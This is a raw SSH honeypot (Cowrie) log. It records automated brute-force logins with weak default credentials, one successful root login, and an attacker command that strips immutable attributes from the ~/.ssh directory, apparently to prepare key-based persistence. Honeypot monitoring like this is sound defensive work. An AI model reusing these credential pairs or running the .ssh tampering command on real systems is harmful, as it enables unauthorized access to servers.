,"rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:44:22.757563Z","src_ip":"212.227.235.229","session":"8e9135fb70c6"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"welcome","message":"login attempt [ubuntu/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:28.890210Z","src_ip":"212.227.235.229","session":"8e9135fb70c6"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:30.617077Z","src_ip":"212.227.235.229","session":"8e9135fb70c6"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:36.879974Z","src_ip":"212.227.125.160","session":"d8f1cd29b444"}
{"eventid":"cowrie.session.closed","duration":"28.1","message":"Connection lost after 28.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:41.790883Z","src_ip":"212.227.125.160","session":"d8f1cd29b444"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59950,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aed38547a69","protocol":"ssh","message":"New connection: 212.227.125.160:59950 (1.2.3.4:22) [session: 9aed38547a69]","sensor":"my-vps","timestamp":"2025-08-31T06:44:43.574232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:44:43.898805Z","src_ip":"212.227.125.160","session":"9aed38547a69"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:44:43.900079Z","src_ip":"212.227.125.160","session":"9aed38547a69"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"welcome","message":"login attempt [ubuntu/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:45.488962Z","src_ip":"212.227.125.160","session":"9aed38547a69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24889,"dst_ip":"1.2.3.4","dst_port":22,"session":"2539db59d91b","protocol":"ssh","message":"New connection: 212.227.235.229:24889 (1.2.3.4:22) [session: 2539db59d91b]","sensor":"my-vps","timestamp":"2025-08-31T06:44:46.963798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:44:46.967219Z","src_ip":"212.227.235.229","session":"2539db59d91b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:44:47.205632Z","src_ip":"212.227.235.229","session":"2539db59d91b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:47.323529Z","src_ip":"212.227.125.160","session":"9aed38547a69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37860,"dst_ip":"1.2.3.4","dst_port":22,"session":"dda7d09aec4e","protocol":"ssh","message":"New connection: 212.227.235.229:37860 (1.2.3.4:22) [session: dda7d09aec4e]","sensor":"my-vps","timestamp":"2025-08-31T06:44:47.450232Z"}
{"eventid":"cowrie.login.failed","username":"thomas","password":"thomas123","message":"login attempt [thomas/thomas123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:48.168483Z","src_ip":"212.227.235.229","session":"2539db59d91b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:44:48.473513Z","src_ip":"212.227.235.229","session":"dda7d09aec4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:44:48.474471Z","src_ip":"212.227.235.229","session":"dda7d09aec4e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:49.412746Z","src_ip":"212.227.235.229","session":"2539db59d91b"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T06:44:54.209026Z","src_ip":"212.227.235.229","session":"dda7d09aec4e"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:44:57.019343Z","src_ip":"212.227.235.229","session":"dda7d09aec4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54300,"dst_ip":"1.2.3.4","dst_port":22,"session":"f40ededc5a8c","protocol":"ssh","message":"New connection: 212.227.125.160:54300 (1.2.3.4:22) [session: f40ededc5a8c]","sensor":"my-vps","timestamp":"2025-08-31T06:45:05.079574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:45:10.924955Z","src_ip":"212.227.125.160","session":"f40ededc5a8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:45:10.925954Z","src_ip":"212.227.125.160","session":"f40ededc5a8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48138,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4672d93a05b","protocol":"ssh","message":"New connection: 212.227.235.229:48138 (1.2.3.4:22) [session: d4672d93a05b]","sensor":"my-vps","timestamp":"2025-08-31T06:45:21.359189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:45:22.191422Z","src_ip":"212.227.235.229","session":"d4672d93a05b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:45:22.238366Z","src_ip":"212.227.235.229","session":"d4672d93a05b"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:45:22.407710Z","src_ip":"212.227.125.160","session":"f40ededc5a8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47010,"dst_ip":"1.2.3.4","dst_port":22,"session":"482b7af9989c","protocol":"ssh","message":"New connection: 212.227.235.229:47010 (1.2.3.4:22) [session: 482b7af9989c]","sensor":"my-vps","timestamp":"2025-08-31T06:45:25.213358Z"}
{"eventid":"cowrie.session.closed","duration":"22.3","message":"Connection lost after 22.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:45:27.362442Z","src_ip":"212.227.125.160","session":"f40ededc5a8c"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123","message":"login attempt [ubuntu/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:45:27.802585Z","src_ip":"212.227.235.229","session":"d4672d93a05b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:45:28.120955Z","src_ip":"212.227.235.229","session":"482b7af9989c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:45:28.121785Z","src_ip":"212.227.235.229","session":"482b7af9989c"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:45:29.607404Z","src_ip":"212.227.235.229","session":"d4672d93a05b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44038,"dst_ip":"1.2.3.4","dst_port":22,"session":"91fc21056ab7","protocol":"ssh","message":"New connection: 212.227.235.229:44038 (1.2.3.4:22) [session: 91fc21056ab7]","sensor":"my-vps","timestamp":"2025-08-31T06:45:36.200627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:45:36.229964Z","src_ip":"212.227.235.229","session":"91fc21056ab7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:45:36.399179Z","src_ip":"212.227.235.229","session":"91fc21056ab7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38044,"dst_ip":"1.2.3.4","dst_port":22,"session":"facd9f582b4b","protocol":"ssh","message":"New connection: 212.227.125.160:38044 (1.2.3.4:22) [session: facd9f582b4b]","sensor":"my-vps","timestamp":"2025-08-31T06:45:42.021852Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"!QAZ2wsx3edc","message":"login attempt [user/!QAZ2wsx3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T06:45:42.242198Z","src_ip":"212.227.235.229","session":"91fc21056ab7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:45:42.531529Z","src_ip":"212.227.125.160","session":"facd9f582b4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49102,"dst_ip":"1.2.3.4","dst_port":22,"session":"705e5d96b58e","protocol":"ssh","message":"New connection: 212.227.125.160:49102 (1.2.3.4:22) [session: 705e5d96b58e]","sensor":"my-vps","timestamp":"2025-08-31T06:45:42.555610Z"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:45:42.582165Z","src_ip":"212.227.125.160","session":"facd9f582b4b"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:45:43.423810Z","src_ip":"212.227.235.229","session":"91fc21056ab7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123","message":"login attempt [ubuntu/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:45:44.425281Z","src_ip":"212.227.125.160","session":"facd9f582b4b"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:45:45.898630Z","src_ip":"212.227.125.160","session":"facd9f582b4b"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:45:55.123913Z","src_ip":"212.227.235.229","session":"482b7af9989c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52622,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f621c82d92","protocol":"ssh","message":"New connection: 212.227.235.229:52622 (1.2.3.4:22) [session: f0f621c82d92]","sensor":"my-vps","timestamp":"2025-08-31T06:46:02.963850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:46:02.964702Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:46:03.173840Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.closed","duration":"21.0","message":"Connection lost after 21.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:03.605705Z","src_ip":"212.227.125.160","session":"705e5d96b58e"}
{"eventid":"cowrie.login.success","username":"root","password":"reza1234","message":"login attempt [root/reza1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.053105Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:46:04.494505Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.495226Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.496388Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.709043Z","src_ip":"212.227.235.229","session":"f0f621c82d92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48895,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dc701fe99c2","protocol":"ssh","message":"New connection: 212.227.235.229:48895 (1.2.3.4:22) [session: 9dc701fe99c2]","sensor":"my-vps","timestamp":"2025-08-31T06:46:04.941579Z"}
